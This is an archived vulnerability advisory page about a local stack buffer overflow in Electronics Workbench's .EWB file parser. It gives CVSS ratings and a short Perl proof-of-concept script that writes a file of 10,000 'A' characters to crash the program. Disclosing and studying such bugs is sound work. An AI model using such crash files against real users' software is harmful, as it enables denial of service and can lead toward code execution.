Electronics Workbench (EWB File) Local Stack Overflow PoC

2008.12.10
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

#!/usr/local/bin/perl # # # OOO OOO OO OOO # O O O O O # O O O O O # O O OO OO OOOOO OOOOO OOO OO OOOOOO O O OO OO OOOOO # O O OO O O O O O OO O O O O O OO O O O # O O O O O O OOOOOOO O O O O O O OOOOOOO # O O O O O O O O O O O O O O # O O O O O O O O O O O O O O O O O # OOO OOO OOO OOOOOO OOOOO OOOOO OOOOOO OOO OOO OOO OOOOO # # [+] Application : Electronics Workbench # # [+] Application's Description : (" Electronics Workbench sets the standard for affordable simulators. # The tight integration of its schematic editor, SPICE simulator and # on-screen waveforms makes what-if scenarios easy and instant. # The exceptional features of this latest release will come as no # surprise to our 80,000 previous customers. Value, power and ease of # use are what Electronics Workbench has always stood for.") # # [+] Bug : Local .EWB File Stack Buffer Overflow (PoC) # # [+] Author : Underz0ne Crew # Zigma # # I just got the program from my Elctronic's professor , Instead of simulating my homework I fuzzed it , I think I m geek :S , whatever # $filename = "fuzz.ewb"; $overflow = "A" x 10000; print "\n\n[+] Evil file to fuzz : $filename ...\r\n"; sleep(2); open(ewb, ">./$filename") || die "\nCannot open $filename: $!"; print ewb "$overflow"; close (ewb); print "\n[+] file successfully created!\r\n";

Referencje:

http://xforce.iss.net/xforce/xfdb/46996


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top